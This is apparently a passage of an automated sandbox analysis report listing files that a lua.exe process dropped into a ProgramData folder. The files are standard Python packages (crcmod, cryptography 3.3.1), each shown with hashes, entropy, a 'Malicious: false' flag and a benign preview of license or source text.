Preview:	#-----------------------------------------------------------------------------.# Copyright (c) 2010 Raymond L. Buvel.# Copyright (c) 2010 Craig McQueen.#.# Permission is hereby granted, free of charge, to any person obtaining a copy.# of this software and associated documentation files (the "Software"), to deal.# in the Software without restriction, including without limitation the rights.# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell.# copies of the Software, and to permit persons to whom the Software is.# furnished to do so, subject to the following conditions:.# .# The above copyright notice and this permission notice shall be included in.# all copies or substantial portions of the Software..# .# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR.# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,.# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE.# AUTHORS OR COPYRIGHT HOLDERS B

C:\ProgramData\ShellExperienceHost\Lib\site-packages\crcmod\predefined.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	9606
Entropy (8bit):	4.780657075344822
Encrypted:	false
SSDEEP:	192:FQHWSoK5hJ6O9bP3nR22yhu4IH8f1Y/Z2dUp1yN0crMawiK7hLAbfCT:FjSoK5hJ6O9bP3nMrhu4IH8f1cZ2dAYK
MD5:	428DA20E50B6A61B04BDAAA437B8338E
SHA1:	36C2053CD136D8A435BA5376B2BC6ADFA6500FD8
SHA-256:	6957449A0D0D120463A2AADF33161A92991E814362A77F5CCC7A38A4D71A8F9E
SHA-512:	4E8DBCF00D10835FEED8AC0698BA7962D6069CEF54C8C357C693FBB24D1F4F5C56C67FE7EB90A75F5F79135535A5D43B9D7E73E0F60797318FE779BE772FDB2F
Malicious:	false
Preview:	#-----------------------------------------------------------------------------.# Copyright (c) 2010 Craig McQueen.#.# Permission is hereby granted, free of charge, to any person obtaining a copy.# of this software and associated documentation files (the "Software"), to deal.# in the Software without restriction, including without limitation the rights.# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell.# copies of the Software, and to permit persons to whom the Software is.# furnished to do so, subject to the following conditions:.# .# The above copyright notice and this permission notice shall be included in.# all copies or substantial portions of the Software..# .# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR.# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,.# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE.# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER

C:\ProgramData\ShellExperienceHost\Lib\site-packages\crcmod\test.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	18433
Entropy (8bit):	4.8508744262918535
Encrypted:	false
SSDEEP:	192:6QHWSSTrWJ/zoPd7MO8Uj7Di9XZ+jvYMMj2cUqOx+C0ishKbqlQsQJwTDtqF7zqZ:6jSBzoldjcYxM/zCebu3IwqiOiK
MD5:	C208C614B8ED979A0A45ECCF3ECBCC50
SHA1:	1851520E5358F6E3556853CB985294009951490D
SHA-256:	0723D05A13A369A8261B65081358932A54E7905B6C50C4281A42A3510F7F191A
SHA-512:	9821DBCC9193D380C1931AA63B111764F41CD9AD832D97FB65B1B0FD728D0B5E178350195FDD4165D9D3F02D3B836AAC5D3C4F70CCB6494F285EB2955EE9500B
Malicious:	false
Preview:	#-----------------------------------------------------------------------------.# Copyright (c) 2010 Raymond L. Buvel.# Copyright (c) 2010 Craig McQueen.#.# Permission is hereby granted, free of charge, to any person obtaining a copy.# of this software and associated documentation files (the "Software"), to deal.# in the Software without restriction, including without limitation the rights.# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell.# copies of the Software, and to permit persons to whom the Software is.# furnished to do so, subject to the following conditions:.# .# The above copyright notice and this permission notice shall be included in.# all copies or substantial portions of the Software..# .# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR.# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,.# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE.# AUTHORS OR COPYRIGHT HOLDERS B

C:\ProgramData\ShellExperienceHost\Lib\site-packages\cryptography-3.3.1.dist-info\AUTHORS.rst Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	2475
Entropy (8bit):	5.403379114408003
Encrypted:	false
SSDEEP:	48:40kBtxEukYWS7Gs0qjUvI4E3yLJcISFdqEnMKScf3g5kQN26GcniFEnA/B:6txEukssv0iLJc1Fd9ZSgVQN26TnueA
MD5:	9C3ACB375812B3915D58B89C653FE892
SHA1:	A5DF3981C751CECC203A35014D1D05FA2150AF04
SHA-256:	32829394FEB23A69CB0BF2976AB1D540FD2C22D064D7576D67B2F3574561341D
SHA-512:	D5469F7E654C1D7AED09C59827371DC01E1BD29B719B31E8C48A3DCA7600BA7590A02221C3019CDB1486EE5858C5A5595C278FFCDA52604B21024A2093FDC965
Malicious:	false
Preview:	AUTHORS.=======..PGP key fingerprints are enclosed in parentheses...* Alex Gaynor <alex.gaynor@gmail.com> (E27D 4AA0 1651 72CB C5D2 AF2B 125F 5C67 DFE9 4084).* Hynek Schlawack <hs@ox.cx> (C2A0 4F86 ACE2 8ADC F817 DBB7 AE25 3622 7F69 F181).* Donald Stufft <donald@stufft.io>.* Laurens Van Houtven <_@lvh.io> (D9DC 4315 772F 8E91 DD22 B153 DFD1 3DF7 A8DD 569B).* Christian Heimes <christian@python.org>.* Paul Kehrer <paul.l.kehrer@gmail.com> (05FD 9FA1 6CF7 5735 0D91 A560 235A E5F1 29F9 ED98).* Jarret Raim <jarito@gmail.com>.* Alex Stapleton <alexs@prol.etari.at> (A1C7 E50B 66DE 39ED C847 9665 8E3C 20D1 9BD9 5C4C).* David Reid <dreid@dreid.org> (0F83 CC87 B32F 482B C726 B58A 9FBF D8F4 DA89 6D74).* Matthew Lefkowitz <glyph@twistedmatrix.com> (06AB F638 E878 CD29 1264 18AB 7EC2 8125 0FBC 4A07).* Konstantinos Koukopoulos <koukopoulos@gmail.com> (D6BD 52B6 8C99 A91C E2C8 934D 3300 566B 3A46 726E).* Stephen Holsapple <sholsapp@gmail.com>.* Terry Chia <terrycwk1994@gmail.com>.* Matthew Iverse

C:\ProgramData\ShellExperienceHost\Lib\site-packages\cryptography-3.3.1.dist-info\INSTALLER Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	4
Entropy (8bit):	1.5
Encrypted:	false
SSDEEP:	3:Mn:M
MD5:	365C9BFEB7D89244F2CE01C1DE44CB85
SHA1:	D7A03141D5D6B1E88B6B59EF08B6681DF212C599
SHA-256:	CEEBAE7B8927A3227E5303CF5E0F1F7B34BB542AD7250AC03FBCDE36EC2F1508
SHA-512:	D220D322A4053D84130567D626A9F7BB2FB8F0B854DA1621F001826DC61B0ED6D3F91793627E6F0AC2AC27AEA2B986B6A7A63427F05FE004D8A2ADFBDADC13C1
Malicious:	false
Preview:	pip.

C:\ProgramData\ShellExperienceHost\Lib\site-packages\cryptography-3.3.1.dist-info\LICENSE Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	323
Entropy (8bit):	4.554768229532207
Encrypted:	false
SSDEEP:	6:h9Co8FyQjkDYc5tWreLBF/pn2mHr2DASvUSBT5+FL8tjivzn:h9aVM/mrGzRsvUSBT5+J8li7n
MD5:	BF405A8056A6647E7D077B0E7BC36ABA
SHA1:	36C43938EFD5C62DDEC283557007E4BDFB4E0797
SHA-256:	43DAD2CC752AB721CD9A9F36ECE70FB53AB7713551F2D3D8694D8E8C5A06D6E2
SHA-512:	16590110B2F659D9C131B2093E05D30919A67368154305DCFE8D54FB88525F49F9F9F385A77BA5BCBEA8092061011D72B1BCC65CDC784BCFDDE10CE4DCE5586F
Malicious:	false
Preview:	This software is made available under the terms of either of the licenses.found in LICENSE.APACHE or LICENSE.BSD. Contributions to cryptography are made.under the terms of both these licenses...The code used in the OS random engine is derived from CPython, and is licensed.under the terms of the PSF License Agreement..

C:\ProgramData\ShellExperienceHost\Lib\site-packages\cryptography-3.3.1.dist-info\LICENSE.APACHE Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	11360
Entropy (8bit):	4.426756947907149
Encrypted:	false
SSDEEP:	192:nUDG5KXSD9VYUKhu1JVF9hFGvV/QiGkS594drFjuHYx5dvTrLh3kTSEnQHbHR:UIvlKM1zJlFvmNz5VrlkTS0QHt
MD5:	4E168CCE331E5C827D4C2B68A6200E1B
SHA1:	DE33EAD2BEE64352544CE0AA9E410C0C44FDF7D9
SHA-256:	AAC73B3148F6D1D7111DBCA32099F68D26C644C6813AE1E4F05F6579AA2663FE
SHA-512:	F451048E81A49FBFA11B49DE16FF46C52A8E3042D1BCC3A50AAF7712B097BED9AE9AED9149C21476C2A1E12F1583D4810A6D36569E993FE1AD3879942E5B0D52
Malicious:	false
Preview:	. Apache License. Version 2.0, January 2004. https://www.apache.org/licenses/.. TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION.. 1. Definitions... "License" shall mean the terms and conditions for use, reproduction,. and distribution as defined by Sections 1 through 9 of this document... "Licensor" shall mean the copyright owner or entity authorized by. the copyright owner that is granting the License... "Legal Entity" shall mean the union of the acting entity and all. other entities that control, are controlled by, or are under common. control with that entity. For the purposes of this definition,. "control" means (i) the power, direct or indirect, to cause the. direction or management of such entity, whether by contract or. otherwise, or (ii) ownership of fifty percent (50%) or more of the. outstanding shares, or (iii) beneficial ow

C:\ProgramData\ShellExperienceHost\Lib\site-packages\cryptography-3.3.1.dist-info\LICENSE.BSD Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	1532
Entropy (8bit):	5.058591167088024
Encrypted:	false
SSDEEP:	24:MjUnoorbOFFTJJyRrYFTjzMbmqEvBTP4m96432s4EOkUTKQROJ32s3yxsITf+3tY:MkOFJSrYJsaN5P406432svv32s3EsIqm
MD5:	5AE30BA4123BC4F2FA49AA0B0DCE887B
SHA1:	EA5B412C09F3B29BA1D81A61B878C5C16FFE69D8
SHA-256:	602C4C7482DE6479DD2E9793CDA275E5E63D773DACD1ECA689232AB7008FB4FB
SHA-512:	DDBB20C80ADBC8F4118C10D3E116A5CD6536F72077C5916D87258E155BE561B89EB45C6341A1E856EC308B49A4CB4DBA1408EABD6A781FBE18D6C71C32B72C41
Malicious:	false
Preview:	Copyright (c) Individual contributors..All rights reserved...Redistribution and use in source and binary forms, with or without.modification, are permitted provided that the following conditions are met:.. 1. Redistributions of source code must retain the above copyright notice,. this list of conditions and the following disclaimer... 2. Redistributions in binary form must reproduce the above copyright. notice, this list of conditions and the following disclaimer in the. documentation and/or other materials provided with the distribution... 3. Neither the name of PyCA Cryptography nor the names of its contributors. may be used to endorse or promote products derived from this software. without specific prior written permission...THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND.ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED.WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOS

C:\ProgramData\ShellExperienceHost\Lib\site-packages\cryptography-3.3.1.dist-info\LICENSE.PSF Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	2415
Entropy (8bit):	5.015031803022437
Encrypted:	false
SSDEEP:	48:xUXyp7TEJzIXFCPXB/XF/gwHsV3XF2iDaGkiCXF1u0A2s/8AMUiioTqNyPhIXF+v:KXG3EJ0EPX9rsV3ZdkZ8oAShTkyZIYAw
MD5:	43C37D21E1DBAD10CDDCD150BA2C0595
SHA1:	ACF6B1628B04FE43A99071223CDBD7B66691C264
SHA-256:	693EC0A662B39F995A4F252B03A6222945470C1B6F12CA02918E4EFE0DF64B9F
SHA-512:	96D7C63AD24F7543599F0FED919948E486B35D01694BE02D980A8BA3D2A8B5A0E42341D940841D3528F56F09A582D32B3E81DED44BB3AAD1874C92650CB08129
Malicious:	false
Preview:	1. This LICENSE AGREEMENT is between the Python Software Foundation ("PSF"), and. the Individual or Organization ("Licensee") accessing and otherwise using Python. 2.7.12 software in source or binary form and its associated documentation...2. Subject to the terms and conditions of this License Agreement, PSF hereby. grants Licensee a nonexclusive, royalty-free, world-wide license to reproduce,. analyze, test, perform and/or display publicly, prepare derivative works,. distribute, and otherwise use Python 2.7.12 alone or in any derivative. version, provided, however, that PSF's License Agreement and PSF's notice of. copyright, i.e., "Copyright . 2001-2016 Python Software Foundation; All Rights. Reserved" are retained in Python 2.7.12 alone or in any derivative version. prepared by Licensee...3. In the event Licensee prepares a derivative work that is based on or. incorporates Python 2.7.12 or any part thereof, and wants to make the. derivative work available to ot

C:\ProgramData\ShellExperienceHost\Lib\site-packages\cryptography-3.3.1.dist-info\METADATA Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	5061
Entropy (8bit):	5.128334355242689
Encrypted:	false
SSDEEP:	96:DD4y4WQIUQIhQIKQILbQIRIjaamPktxsx61A0ivAEYaCF0KrE2jQech5mjvE2osr:NacPuPBs6u0ivAEYaCF0KrE2jE0jvE2j
MD5:	8D3598F5FD83E942F61E9593F20A831A
SHA1:	048AEE64342CFB2144D1D27E91BE953A466A459E
SHA-256:	85B77C81DFA9DC6F754500EF6F1027FF278376FD0A1FDB6F681420519CA388C0
SHA-512:	1D117E76577591CCA0AC3E202F1431D84D425E10A781B5245AB45DB5C9565F3A05B179BCAF1C41CA3766406D05B38778A8EAA022399C93099C369B6BFB88640D
Malicious:	false
Preview:	Metadata-Version: 2.1.Name: cryptography.Version: 3.3.1.Summary: cryptography is a package which provides cryptographic recipes and primitives to Python developers..Home-page: https://github.com/pyca/cryptography.Author: The cryptography developers.Author-email: cryptography-dev@python.org.License: BSD or Apache License, Version 2.0.Platform: UNKNOWN.Classifier: Development Status :: 5 - Production/Stable.Classifier: Intended Audience :: Developers.Classifier: License :: OSI Approved :: Apache Software License.Classifier: License :: OSI Approved :: BSD License.Classifier: Natural Language :: English.Classifier: Operating System :: MacOS :: MacOS X.Classifier: Operating System :: POSIX.Classifier: Operating System :: POSIX :: BSD.Classifier: Operating System :: POSIX :: Linux.Classifier: Operating System :: Microsoft :: Windows.Classifier: Programming Language :: Python.Classifier: Programming Language :: Python :: 2.Classifier: Programming Language :: Python :: 2.7.Classifier: Programm

C:\ProgramData\ShellExperienceHost\Lib\site-packages\cryptography-3.3.1.dist-info\RECORD Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	15452
Entropy (8bit):	5.530611105249037
Encrypted:	false
SSDEEP:	192:1X1nNY9YSm8wre15vIWXxk2Yy/xKTpHGoOhVZqNW/AxN8Eb9:1XJ+mh8wrY5vIWlYy/xKTpHtOhVZ8p
MD5:	BC00ABCFA5D5027406F6B5269B3B7FAD
SHA1:	BAAD994E468B581FE9B2FA18569826E3D889D09F
SHA-256:	C076989CC862816B0E5ED067EBA3BBF79070950E689A047B30CE979BF349CD4E
SHA-512:	EEAF4D7610EF015A29A6AE37EFBB24F662E53C1D67747058E2110527B6D3E09DCC17406C3674A8828277B90A5FD8859CDC45891CB4A9E1D0D977D748CECF3EE0
Malicious:	false
Preview:	cryptography-3.3.1.dist-info/AUTHORS.rst,sha256=MoKTlP6yOmnLC_KXarHVQP0sItBk11dtZ7LzV0VhNB0,2475..cryptography-3.3.1.dist-info/INSTALLER,sha256=zuuue4knoyJ-UwPPXg8fezS7VCrXJQrAP7zeNuwvFQg,4..cryptography-3.3.1.dist-info/LICENSE,sha256=Q9rSzHUqtyHNmp827OcPtTq3cTVR8tPYaU2OjFoG1uI,323..cryptography-3.3.1.dist-info/LICENSE.APACHE,sha256=qsc7MUj20dcRHbyjIJn2jSbGRMaBOuHk8F9leaomY_4,11360..cryptography-3.3.1.dist-info/LICENSE.BSD,sha256=YCxMdILeZHndLpeTzaJ15eY9dz2s0eymiSMqtwCPtPs,1532..cryptography-3.3.1.dist-info/LICENSE.PSF,sha256=aT7ApmKzn5laTyUrA6YiKUVHDBtvEsoCkY5O_g32S58,2415..cryptography-3.3.1.dist-info/METADATA,sha256=hbd8gd-p3G91RQDvbxAn_yeDdv0KH9tvaBQgUZyjiMA,5061..cryptography-3.3.1.dist-info/RECORD,,..cryptography-3.3.1.dist-info/REQUESTED,sha256=47DEQpj8HBSa-_TImW-5JCeuQeRkm5NMpJWZG3hSuFU,0..cryptography-3.3.1.dist-info/WHEEL,sha256=JR9h7KKe5NaT-MEx7K4Mr4spU7A8Rx79smi0Xdo5n28,96..cryptography-3.3.1.dist-info/top_level.txt,sha256=rR2wh6A6juD02TBZNJqqonh8x9UP9Sa5Z9Hl1pCPCiM,31..cry

C:\ProgramData\ShellExperienceHost\Lib\site-packages\cryptography-3.3.1.dist-info\WHEEL Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	96
Entropy (8bit):	4.918426699477594
Encrypted:	false
SSDEEP:	3:RtEeX7MWcSlViHnRRP+tkKc5vKWnn:RtBMwlViHjWK/SWn
MD5:	34F739FF093860E9ED54C544FECE5F53
SHA1:	6273413F09CEE0C0F20B18318544C74511127051
SHA-256:	251F61ECA29EE4D693F8C131ECAE0CAF8B2953B03C471EFDB268B45DDA399F6F
SHA-512:	B14CD14296172B413905AB2B605D457810F17F9B2A94408CA0B752A727902741610B34E8A359D628B98D4DC45ED5E3A0C163D2F5FDD3AFC728D66ED0E3769126
Malicious:	false
Preview:	Wheel-Version: 1.0.Generator: bdist_wheel (0.36.1).Root-Is-Purelib: false.Tag: cp36-abi3-win32..

C:\ProgramData\ShellExperienceHost\Lib\site-packages\cryptography-3.3.1.dist-info\top_level.txt Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	31
Entropy (8bit):	3.962103165155795
Encrypted:	false
SSDEEP:	3:DA1JjBHvAYuOv:DUOev
MD5:	62246E29EB9A005B743A15C18FE944DD
SHA1:	10A5E354DAA692FF714D3C49BED348ABD8A485C7
SHA-256:	AD1DB087A03A8EE0F4D93059349AAAA2787CC7D50FF526B967D1E5D6908F0A23
SHA-512:	F16FDA3B0A05A1B5F7D8F63E8A223B27CA4689F559D4A00357E129ECB24AD3E8B4519A70D59919DE8D93ADC8AD3B0EAF05192E3D18CE876D7DCA13ED498A0FCC
Malicious:	false
Preview:	_openssl._padding.cryptography.

C:\ProgramData\ShellExperienceHost\Lib\site-packages\cryptography\__about__.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	835
Entropy (8bit):	4.753005565866257
Encrypted:	false
SSDEEP:	24:q9O0opQ2PFNz14MHqiVwdQ+CJb1H0tIeE:IDoW+FNSMKBdQ+CvUtrE
MD5:	0445AA9B0912530008743D12A72713B0
SHA1:	7D240A5808375815CE1B3F4B07271C5E9BAEC00F
SHA-256:	4E436BBE70D0200F7DCB172048C3721107A99A0D3345FDF6CF4EA09B870C0B12
SHA-512:	7698D08AAC277A3AB55D48F8B505B36A61A08AE7E30ED16CBFA5DDAB331645DA11230CC02490C953DF130AF173FD779808A9D5549D9A4CD57F2DB8F6EC009639
Malicious:	false
Preview:	# This file is dual licensed under the terms of the Apache License, Version.# 2.0, and the BSD License. See the LICENSE file in the root of this repository.# for complete details...from __future__ import absolute_import, division, print_function..__all__ = [. "__title__",. "__summary__",. "__uri__",. "__version__",. "__author__",. "__email__",. "__license__",. "__copyright__",.]..__title__ = "cryptography".__summary__ = (. "cryptography is a package which provides cryptographic recipes". " and primitives to Python developers.".).__uri__ = "https://github.com/pyca/cryptography"..__version__ = "3.3.1"..__author__ = "The cryptography developers".__email__ = "cryptography-dev@python.org"..__license__ = "BSD or Apache License, Version 2.0".__copyright__ = "Copyright 2013-2020 {}".format(__author__).

C:\ProgramData\ShellExperienceHost\Lib\site-packages\cryptography\__init__.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	964
Entropy (8bit):	4.522951086975249
Encrypted:	false
SSDEEP:	24:q9O0opQ29JQAJFOX5MFNz14MHqK4AXm3YMWNnEv:IDoWIBqXKFNSMKKPXhMwG
MD5:	27C6DA2BB69C3D260E43267FC6EB9001
SHA1:	0CAAFE684D8C1A2985A902C2D9E2FD64B5D93696
SHA-256:	949E4750E1822A2F6BF971B8637A97ABD761085BFC46AC1929982442340B6E80
SHA-512:	72C68202922379203A46BE370F1B546FDC8AA73EAA8788D8F44D1598201DBCF762CCCC8933AB9A210BF7180B2E6E97520B238556E149C1F9576F72BC2B7516B8
Malicious:	false
Preview:	# This file is dual licensed under the terms of the Apache License, Version.# 2.0, and the BSD License. See the LICENSE file in the root of this repository.# for complete details...from __future__ import absolute_import, division, print_function..import sys.import warnings..from cryptography.__about__ import (. __author__,. __copyright__,. __email__,. __license__,. __summary__,. __title__,. __uri__,. __version__,.).from cryptography.utils import CryptographyDeprecationWarning...__all__ = [. "__title__",. "__summary__",. "__uri__",. "__version__",. "__author__",. "__email__",. "__license__",. "__copyright__",.]..if sys.version_info[0] == 2:. warnings.warn(. "Python 2 is no longer supported by the Python core team. Support for ". "it is now deprecated in cryptography, and will be removed in the ". "next release.",. CryptographyDeprecationWarning,. stacklevel=2,. ).

C:\ProgramData\ShellExperienceHost\Lib\site-packages\cryptography\exceptions.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	1259
Entropy (8bit):	5.129548297089059
Encrypted:	false
SSDEEP:	24:q9O0opQ2mYpNfZxAu/WNDMShAfa7ZVW+jAohNsz:IDoWPYfZx2hd1VhRra
MD5:	5136839F6F7C2D538449AE913D696202
SHA1:	EF32D91100D4F53D101A3E9B657B17DF528B51D5
SHA-256:	34FB43A88AB596C43519BD415E48EC188BDB32B58C68A09A4FC7A9892822D35D
SHA-512:	912D74F4FA08EF0DF6DF69A714005905CF997FCC10CCAB1F494857C04B91DEF65F3A3530A2A704A8F7676D021D268B15D339EFBBDB1703601073DA7BB20714CB
Malicious:	false
Preview:	# This file is dual licensed under the terms of the Apache License, Version.# 2.0, and the BSD License. See the LICENSE file in the root of this repository.# for complete details...from __future__ import absolute_import, division, print_function..from enum import Enum...class _Reasons(Enum):. BACKEND_MISSING_INTERFACE = 0. UNSUPPORTED_HASH = 1. UNSUPPORTED_CIPHER = 2. UNSUPPORTED_PADDING = 3. UNSUPPORTED_MGF = 4. UNSUPPORTED_PUBLIC_KEY_ALGORITHM = 5. UNSUPPORTED_ELLIPTIC_CURVE = 6. UNSUPPORTED_SERIALIZATION = 7. UNSUPPORTED_X509 = 8. UNSUPPORTED_EXCHANGE_ALGORITHM = 9. UNSUPPORTED_DIFFIE_HELLMAN = 10. UNSUPPORTED_MAC = 11...class UnsupportedAlgorithm(Exception):. def __init__(self, message, reason=None):. super(UnsupportedAlgorithm, self).__init__(message). self._reason = reason...class AlreadyFinalized(Exception):. pass...class AlreadyUpdated(Exception):. pass...class NotYetFinalized(Exception):. pass...class InvalidTag(Exc

C:\ProgramData\ShellExperienceHost\Lib\site-packages\cryptography\fernet.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	5980
Entropy (8bit):	4.52504446520189
Encrypted:	false
SSDEEP:	96:FmNeldXR15TZasDhDQVR6mXLYe0octwzlv7V5pfsPmD8Xq4Z:F8g9LRAx0R88L
MD5:	40F266D99FBF3F3468459A989093BEF7
SHA1:	DC99F16DC963222D988EFF98AB5980B7B5364FC7
SHA-256:	B20E5134E08AC7D06B3D5EB021FC9707DB03589730F7E18F70F80DE25566AFCC
SHA-512:	A2FC7C7EA39416D9F00190FD0FDB3286CEAED91C102AC64201831A4BA0EE937FA4AFAEDA8F57856E2B33512BCF119F8F9E517026F90E2A998D1F45AFC5158FAD
Malicious:	false
Preview:	# This file is dual licensed under the terms of the Apache License, Version.# 2.0, and the BSD License. See the LICENSE file in the root of this repository.# for complete details...from __future__ import absolute_import, division, print_function..import base64.import binascii.import os.import struct.import time..import six..from cryptography import utils.from cryptography.exceptions import InvalidSignature.from cryptography.hazmat.backends import _get_backend.from cryptography.hazmat.primitives import hashes, padding.from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes.from cryptography.hazmat.primitives.hmac import HMAC...class InvalidToken(Exception):. pass..._MAX_CLOCK_SKEW = 60...class Fernet(object):. def __init__(self, key, backend=None):. backend = _get_backend(backend).. key = base64.urlsafe_b64decode(key). if len(key) != 32:. raise ValueError(. "Fernet key must be 32 url-safe base64-encoded bytes.".

C:\ProgramData\ShellExperienceHost\Lib\site-packages\cryptography\hazmat\__init__.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	483
Entropy (8bit):	4.683135181279414
Encrypted:	false
SSDEEP:	12:qD+6O0vgEVhO17WimkXhY2a7D2XAu8qKz1ziiQjCy5J:q9O0opS6hYKQu2Za22
MD5:	2A6F2AEFCB080E1E28768A08E97F8817
SHA1:	1B34070CD39592BAE50A0D31755F97C7A44C37CC
SHA-256:	8443CD430F1D82320F227E36A9A2F05CD44B0B24C6359792BE441BE7B0CF85BB
SHA-512:	3E4B005450859F04076CCB0BF22D7747826B675600C9DA200E994723069C8B7BFB365302BF55787EFDD84E19D8DEEEB80CBF347F8D89EF4884FDC15175099E89
Malicious:	false
Preview:	# This file is dual licensed under the terms of the Apache License, Version.# 2.0, and the BSD License. See the LICENSE file in the root of this repository.# for complete details..""".Hazardous Materials..This is a "Hazardous Materials" module. You should ONLY use it if you're.100% absolutely sure that you know what you're doing because this module.is full of land mines, dragons, and dinosaurs with laser guns..""".from __future__ import absolute_import, division, print_function.

C:\ProgramData\ShellExperienceHost\Lib\site-packages\cryptography\hazmat\_der.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	5205
Entropy (8bit):	4.5298098889221174
Encrypted:	false
SSDEEP:	96:FExFgA0nnO47mv8L/FX+HmEsUtZElfTH5kQ5XXimWbmNBRfa/qly2DS2pHb1t:FExFghnP3L/IHmEsUtZExDXSmgmNBRS0
MD5:	7E0D66305FAE52E4A65E4735850477CB
SHA1:	7DB543F086DE9D30B043F14D76C3B85AEB07BCD3
SHA-256:	364C3140172B47F28C01908CDD62A2757831F021C5554E62067A0522B850310B
SHA-512:	B85929F28E99B46CC6344A9E3A2762D8CABF0DD8AF3DAC7EC0B23A3E8E00F62A6271433D472DDB99AEA0FEA4355264B1B9E849EFD2EB37337CD34F48D4612591
Malicious:	false
Preview:	# This file is dual licensed under the terms of the Apache License, Version.# 2.0, and the BSD License. See the LICENSE file in the root of this repository.# for complete details...from __future__ import absolute_import, division, print_function..import six..from cryptography.utils import int_from_bytes, int_to_bytes...# This module contains a lightweight DER encoder and decoder. See X.690 for the.# specification. This module intentionally does not implement the more complex.# BER encoding, only DER..#.# Note this implementation treats an element's constructed bit as part of the.# tag. This is fine for DER, where the bit is always computable from the type....CONSTRUCTED = 0x20.CONTEXT_SPECIFIC = 0x80..INTEGER = 0x02.BIT_STRING = 0x03.OCTET_STRING = 0x04.NULL = 0x05.OBJECT_IDENTIFIER = 0x06.SEQUENCE = 0x10 \| CONSTRUCTED.SET = 0x11 \| CONSTRUCTED.PRINTABLE_STRING = 0x13.UTC_TIME = 0x17.GENERALIZED_TIME = 0x18...class DERReader(object):. def __init__(self, data):. self.data = mem

C:\ProgramData\ShellExperienceHost\Lib\site-packages\cryptography\hazmat\_oid.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	2432
Entropy (8bit):	4.265190712278429
Encrypted:	false
SSDEEP:	48:IDoW2+hU0tWjKQAYNIrhkJkbjmtCXrwdPjd0Rm:FZ+hteBIVkJkOnxWm
MD5:	A7853AADBFA5A5CA16ABAF6D1236CA84
SHA1:	D19B25024C32D5E8B972265CDC742447D89EB23B
SHA-256:	DCBD4A2F102C409268CB5E590A5D13E08F8F53E0D5BF3192F994DD4BE3CDCB5E
SHA-512:	A92E3E2F9DB0D4CAA5CA84D6A48E1C8269FA4F410365F166C312B16C4154AA3A20AED0E5E59AB5F33AC19AA1FFF7ED0C298D69A7B1057CE29EB0D67C5DB0BF0F
Malicious:	false
Preview:	# This file is dual licensed under the terms of the Apache License, Version.# 2.0, and the BSD License. See the LICENSE file in the root of this repository.# for complete details...from __future__ import absolute_import, division, print_function..from cryptography import utils...class ObjectIdentifier(object):. def __init__(self, dotted_string):. self._dotted_string = dotted_string.. nodes = self._dotted_string.split("."). intnodes = [].. # There must be at least 2 nodes, the first node must be 0..2, and. # if less than 2, the second node cannot have a value outside the. # range 0..39. All nodes must be integers.. for node in nodes:. try:. node_value = int(node, 10). except ValueError:. raise ValueError(. "Malformed OID: %s (non-integer nodes)". % (self._dotted_string). ). if node_value < 0:. raise ValueE

C:\ProgramData\ShellExperienceHost\Lib\site-packages\cryptography\hazmat\backends\__init__.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	616
Entropy (8bit):	4.53980471954035
Encrypted:	false
SSDEEP:	12:qD+6O0vgEVhO17yDjCy59GxfYpOo7mZOISBAyR2GPc5EkX6Y:q9O0opQ24GhYpt7WuBhRlPqX
